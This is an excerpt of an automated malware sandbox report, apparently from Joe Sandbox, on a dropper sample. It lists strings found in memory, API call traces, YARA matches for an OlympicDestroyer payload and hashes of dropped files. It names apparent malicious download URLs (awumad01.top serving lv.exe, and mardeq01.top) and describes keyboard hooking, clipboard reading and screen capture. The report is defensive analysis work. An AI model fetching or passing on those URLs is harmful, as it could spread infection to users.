Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp	String found in binary or memory: http://awumad01.top/download.php?file=lv.exeqEaRrk
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp	String found in binary or memory: http://awumad01.top/download.php?file=lv.exeskQ
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp	String found in binary or memory: http://mardeq01.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://www.avast.com0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://www.avast.com0/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377605522.0000000005CD2000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Notti.eps.18.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe

Code function: 18_2_004082E1 SetWindowsHookExW 00000002,Function_000082B3,00000000,00000000

18_2_004082E1

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

13_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

Code function: 16_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,

16_2_00409086

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_00414000 Sleep,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

0_2_00414000

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

13_2_004044D1

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383438295.000000000416A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F59AC0 NtdllDefWindowProc_W,	16_2_03F59AC0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F59946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,	16_2_03F59946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A09946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,	22_2_05A09946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A09AC0 NtdllDefWindowProc_W,	22_2_05A09AC0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D9946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,	25_2_059D9946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D9AC0 NtdllDefWindowProc_W,	25_2_059D9AC0

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

13_2_004038AF

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0041609C	0_2_0041609C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004A12A9	0_2_004A12A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004B94A5	0_2_004B94A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004176A8	0_2_004176A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004A79F2	0_2_004A79F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004A0AA0	0_2_004A0AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00409DF0	0_2_00409DF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004A7E56	0_2_004A7E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0044D060	0_2_0044D060
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0049E000	0_2_0049E000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040E0E0	0_2_0040E0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0048D0F0	0_2_0048D0F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004A80BB	0_2_004A80BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00407150	0_2_00407150
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00408160	0_2_00408160
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0046C110	0_2_0046C110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0043A1D0	0_2_0043A1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004BC25E	0_2_004BC25E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0044F230	0_2_0044F230
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004BE2ED	0_2_004BE2ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004072F0	0_2_004072F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004BC37E	0_2_004BC37E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00460310	0_2_00460310
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004AE390	0_2_004AE390
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_004AC3BD	0_2_004AC3BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00423440	0_2_00423440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0048F440	0_2_0048F440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0042B410	0_2_0042B410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00485410	0_2_00485410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00446422	0_2_00446422
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0041D4D0	0_2_0041D4D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00406550	0_2_00406550
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0049C500	0_2_0049C500
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00487520	0_2_00487520
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_0040737E	13_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_00406EFE	13_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_004079A2	13_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_004049A8	13_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004158DD	16_2_004158DD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_00438A70	16_2_00438A70
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043C169	16_2_0043C169
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043D29D	16_2_0043D29D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043F3E9	16_2_0043F3E9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043BC3E	16_2_0043BC3E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043CD1D	16_2_0043CD1D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043C6AD	16_2_0043C6AD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0043CF98	16_2_0043CF98
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F65B2D	16_2_03F65B2D
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_004053A7	18_2_004053A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040A800	18_2_0040A800
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040B0C0	18_2_0040B0C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040A140	18_2_0040A140
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040E970	18_2_0040E970
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00418250	18_2_00418250
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040E208	18_2_0040E208
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040AA10	18_2_0040AA10
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00418A21	18_2_00418A21
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00418AFB	18_2_00418AFB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00409A90	18_2_00409A90
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00409C50	18_2_00409C50
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_0040BC20	18_2_0040BC20
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00416DCB	18_2_00416DCB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00418D93	18_2_00418D93
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00413764	18_2_00413764
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004158DD	22_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_00438A70	22_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043C169	22_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043D29D	22_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043F3E9	22_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043BC3E	22_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043CD1D	22_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043C6AD	22_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0043CF98	22_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A15B2D	22_2_05A15B2D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004158DD	25_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_00438A70	25_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043C169	25_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043D29D	25_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043F3E9	25_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043BC3E	25_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043CD1D	25_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043C6AD	25_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0043CF98	25_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059E5B2D	25_2_059E5B2D

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Murano.exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\4.exe 02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe 1A584D3F6C556EF5B10AEE7D057ADAB2EFFE774D1E85B19FF108899BC84371F3

Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: String function: 004033FF appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: String function: 00401120 appears 130 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: String function: 00421500 appears 65 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: String function: 00421E40 appears 112 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: String function: 00405BC0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 059DA650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040A400 appears 66 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 05A0A650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040F159 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: String function: 0040A400 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: String function: 03F5A650 appears 33 times

Source: vpn.exe.13.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384789346.0000000006210000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamechartv.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.394558547.0000000008680000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384521726.00000000060A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383911985.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
